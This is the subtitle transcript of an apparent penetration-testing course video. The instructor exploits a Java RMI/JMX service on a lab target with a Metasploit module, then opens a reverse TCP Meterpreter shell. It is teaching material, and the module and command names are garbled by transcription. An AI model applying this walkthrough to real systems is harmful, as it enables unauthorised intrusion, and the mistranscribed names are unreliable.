1
00:00:00,300 --> 00:00:01,800
So let me clear my screen.

2
00:00:04,630 --> 00:00:06,540
List services again.

3
00:00:08,950 --> 00:00:13,570
And you exploited SMB service on Matters Portable three.

4
00:00:15,420 --> 00:00:20,250
So now I need the next candidate to exploit.

5
00:00:21,460 --> 00:00:26,740
So let's go a little bit further, shall we, with this is RMI Registry.

6
00:00:27,790 --> 00:00:38,710
Now you can follow different strategies, for example, you can search for a no service name and description.

7
00:00:39,670 --> 00:00:44,530
You can also look for vulnerabilities on the Internet or as a necessary result.

8
00:00:45,530 --> 00:00:46,760
It's entirely up to you.

9
00:00:48,120 --> 00:00:54,320
This time around, I'm going to search RMI as a phrase in a Java platform.

10
00:00:57,480 --> 00:01:01,140
So here are the modules related to Java RMI.

11
00:01:02,210 --> 00:01:07,700
Now, I'm not going to use these blindly, so I need to find a suitable one.

12
00:01:08,990 --> 00:01:16,340
And you can read all the descriptions if you want, and you can also do an Internet search.

13
00:01:17,500 --> 00:01:24,190
Now, the other ones aren't really related, so I'm going to choose Java J Amex server from the exploit

14
00:01:24,190 --> 00:01:24,580
module.

15
00:01:26,640 --> 00:01:31,050
And this time I will directly set our host.

16
00:01:33,380 --> 00:01:36,710
And I'm going to set the R port also.

17
00:01:38,060 --> 00:01:39,290
And check.

18
00:01:40,840 --> 00:01:43,930
So, yes, indeed, the target seems to be vulnerable.

19
00:01:45,070 --> 00:01:51,070
So, yeah, you know, I'm reading your mind here, you've got a new command, the check command.

20
00:01:52,210 --> 00:01:56,290
If the module allows you to do this test, go ahead and use it.

21
00:01:57,340 --> 00:02:00,450
OK, so now let's show some options.

22
00:02:02,650 --> 00:02:10,420
So what's missing here, the payload, right, so before setting the payload, let's have a look at

23
00:02:10,420 --> 00:02:11,200
the suitable ones.

24
00:02:13,010 --> 00:02:14,110
Reverse Java.

25
00:02:14,150 --> 00:02:15,740
Interpreter payload will.

26
00:02:16,630 --> 00:02:18,730
Fit perfectly for this XPoint.

27
00:02:20,380 --> 00:02:27,210
Set payload to Java, Metropia reverse TCP.

28
00:02:28,510 --> 00:02:31,690
And then set the host to your colleagues IP address.

29
00:02:33,420 --> 00:02:42,330
And set down port to any available port, so I'll set mine to four four four seven.

30
00:02:44,230 --> 00:02:45,550
So the options again.

31
00:02:47,240 --> 00:02:48,470
Nothing to change here.

32
00:02:49,390 --> 00:02:50,980
So let's run the XPoint.

33
00:02:56,070 --> 00:02:57,570
All right, so this session open.

34
00:02:58,750 --> 00:03:02,770
And you are in the machine with a restricted service user.